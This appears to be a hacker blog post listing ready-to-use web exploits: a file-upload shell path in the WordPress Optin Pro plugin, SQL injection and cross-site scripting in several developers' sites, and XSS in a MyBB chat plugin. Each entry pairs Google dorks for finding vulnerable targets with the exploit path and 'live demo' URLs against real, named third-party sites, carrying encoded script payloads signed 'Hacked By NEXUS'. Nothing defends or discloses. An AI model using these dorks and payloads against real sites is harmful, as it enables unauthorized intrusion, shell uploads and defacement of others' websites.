Exploit WordPress: Optin Pro - File Upload Vulnerability

Once again, i'm not gonna explain anything about this exploit since it is exactly the same as my previous post. So, i'm just gonna give you the dork and exploit.

DORK: inurl:/wp-content/uploads/svp/headerimage/
inurl:/wp-content/plugins/wp_optin_pro/

EXPLOIT:/wp-content/plugins/wp_optin_pro/media-upload.php

SHELL UPLOADED TO: /wp-content/uploads/svp/headerimage/random_id_filename.php

Espacio Ecuador XSS & SQLI

Dork:

intext:"developed by Espacio Ecuador"


Exploits:

http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= < XSS>


Live Demo:

SQLI:

http://www.galapagostraveline.com/deal.html?opc=31%27


XSS:

http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

Pej Studio & Nissi Infotech & Plante Graffix - XSS

Dork:

intext:"Created By Nissi Infotech"


Exploits:

http://target.com/name.php?id= [XSS & SQLI]


Live Demo:

http://www.jayapriya.com/realestate/projectdetail.php?id=42%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

MyBB Kingchat - XSS

Dork:

inurl:/kingchat.php?


Exploit:

/kingchat.php?notic


Change that /... into this to see exploit:

/kingchat.php?chat=2&l=2


Then add your scripts...

Live Demo:

http://www.embargoedchat.co.uk/kingchat.php?chat=2&l=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Pro-Service - XSS Vulnerability

Dorks:

intext:"Pro-Service" inurl:"/resume_list.php?id="
intext:"Pro-Service"


Exploit:

/resume_list.php?id=


Live Demo:

http://www.staff.ge/resume_list.php?id=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Posted in: NEXUS.PRO.XSS